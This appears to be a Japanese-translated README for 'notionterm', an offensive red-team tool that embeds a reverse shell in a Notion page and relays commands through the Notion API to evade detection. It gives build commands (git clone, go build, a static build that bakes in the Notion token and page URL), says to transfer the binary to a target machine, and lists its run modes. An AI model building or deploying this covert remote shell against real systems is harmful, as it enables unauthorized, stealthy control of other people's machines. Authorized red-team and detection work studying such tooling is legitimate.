
Notion APIをプロキシとしてNotionページにリバースシェルを埋め込み、暗号化および認証された通信を用いたステルスなリモートシェルセッションを可能にし、レッドチームオペレーションを支援します。

notiontermを起動するだけです。
OffensiveNotion と notionion の素晴らしいアイデアから大まかに着想を得ています!
コマンドやフラグを学ぶのは退屈です: wrap-notionterm.sh を使いましょう
notionterm をビルドし、ターゲットマシンに転送する (ビルドを参照)notionterm を実行する主な方法は3つあります:
notionterm [flags]
ON にしてリバースシェル作業を行い、OFF で一時停止、ON で再開など。
notionterm --server [flags]
CTRL+LでページIDを取得): https://[TARGET_URL]/notionterm?url=[NOTION_PAGE_ID]。
light モード
notionterm light [flags]
notionterm はターゲットマシン上で実行されることを想定しているため、環境に合わせてビルドする必要があります。
ターゲット要件に合わせて環境変数を設定します:
GOOS=[windows/linux/darwin]
git clone https://github.com/ariary/notionterm.git && cd notionterm
GOOS=$GOOS go build notionterm.go
APIキーとNotionページURLは、環境変数 (NOTION_TOKEN & NOTION_PAGE_URL) またはフラグ (--token & --page-url) で設定します。
Notion統合APIトークンとNotionページURLをバイナリに直接埋め込みます。 ⚠️ バイナリにアクセスできる人は誰でもトークンを取得できます。セキュリティ上の理由から共有せず、使用後は削除してください。
該当する環境変数を設定:
export NOTION_PAGE_URL=[NOTION_PAGE_URL]
export NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN]
そしてビルド:
git clone https://github.com/ariary/notionterm.git && cd notionterm
./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN $GOOS